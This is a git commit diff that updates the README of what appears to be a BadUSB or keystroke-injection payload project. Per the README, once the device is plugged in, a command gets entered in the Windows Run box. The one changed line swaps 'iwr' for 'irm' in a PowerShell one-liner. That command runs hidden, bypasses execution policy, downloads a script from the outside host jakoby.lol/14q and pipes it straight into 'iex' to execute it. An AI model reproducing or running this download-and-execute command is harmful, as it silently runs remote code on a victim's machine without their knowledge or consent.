Update Readme.md
This commit is contained in:
parent
325f041f3d
commit
bf1cafc98c
1 changed files with 1 additions and 1 deletions
|
@ -45,7 +45,7 @@ Each URL will be passed through the subscribe function.
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/14q | iex
|
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex
|
||||||
```
|
```
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
Loading…
Reference in a new issue